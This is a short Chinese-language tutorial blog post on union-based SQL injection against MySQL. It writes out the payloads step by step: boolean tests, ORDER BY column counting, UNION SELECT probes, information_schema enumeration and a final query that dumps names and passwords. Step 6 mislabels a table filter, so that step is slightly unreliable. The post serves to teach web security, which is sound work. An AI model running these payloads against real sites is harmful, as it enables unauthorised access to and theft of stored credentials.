web安全之简要sql注入

SQL注入原理:可控变量,带入数据库查询,变量中未存在过滤或者过滤不严谨

如何判断注入点?(以下数据库类型为mysql)

老办法:

and 1=1 页面正常

and 1=2 页面错误

可能存在注入点

但是要选用最舒服的方法去测试!

讲一下老方法的原理

select * from users where id=1 and 1=1,正常

select * from users where id=1 and 1=2,错误

前面都是正确的语句,区别在于后面。

如果是1=1,那么就是真且真,结果为真

如果是1=2,那么就是真且假,结果为假

就是说你所自定义的1=1或者1=2,被网站正常执行到了,所以就存在注入点

那么我们就可以自定义一些sql语句,获取数据库的数据,写sql语句可以用到联合查询UNION这个关键字

操作流程如下:

1.判断注入

2.猜测列名数量(字段数),一般用order by去猜

select * from users where id=1 order by (1~n),直到页面不正常即为字段数,比如4正常,5不正常,则字段数为4。

3.猜解准备

select * from users where id=-1 union select 1,2,3,4,正常

注意:id=-1,让前面的语句为错误语句,即可只执行后面的语句,这样的作用是看下哪几列数据可以显示出来,然后将能显示的替换成注入语句即可

4.信息收集

数据库版本:version()

数据库名称:database()

数据库用户:user()

操作系统:@@version_compile_o s

比如说正常显示2和3,那就可以写

select * from users where id=-1 union select 1,database(),version(),4

5.查询指定数据库名下的表名信息

如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'

group_concat()是把多行结果并作一行显示

6.查询指定表名下的列名信息

select * from users where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema='这里写表名'

7.查询指定数据

select * from users where id=-1 union select 1,name,password,4 from 表名

相关推荐
萤丰信息几秒前
智慧园区:数智赋能,重构城市运营新生态
人工智能·科技·安全·重构·架构·智慧城市·智慧园区
南棱笑笑生2 分钟前
20260310解决瑞芯微原厂RK3576的Android14刷入乐晓电子的K7开发板后适配ADB连接
数据库·rockchip
兴通扫码设备3 分钟前
ocr工业场景适配升级:深圳市兴通物联XTC8501智能相机接口与环境适应性技术解析
数据库·人工智能·深度学习·数码相机·计算机视觉
艾莉丝努力练剑7 分钟前
【QT】常用控件(一):初识控件,熟悉QWidget
android·linux·数据库·qt·学习·mysql·qt5
xixixi777779 分钟前
最生活化的方式来理解 VR 和 AR
人工智能·安全·ai·大模型·ar·vr
艾莉丝努力练剑23 分钟前
MySQL查看命令速查表
linux·运维·服务器·网络·数据库·人工智能·mysql
青藤云安全24 分钟前
主机安全最佳实践|青藤万相 × AWS 护航汽车服务平台出海破局
安全·汽车·aws
zhouping@24 分钟前
[羊城杯2020]easyphp
web安全·php
枷锁—sha29 分钟前
【CTFshow-pwn系列】03_栈溢出【pwn 056-057】详解:32位 与64位Shellcode 与 Linux 系统调用底层原理剖析
linux·运维·网络·笔记·安全·网络安全·系统安全
观书喜夜长30 分钟前
XSS 入门实战:反射型、存储型、DOM 型原理与防御(DVWA 靶场)
学习·web安全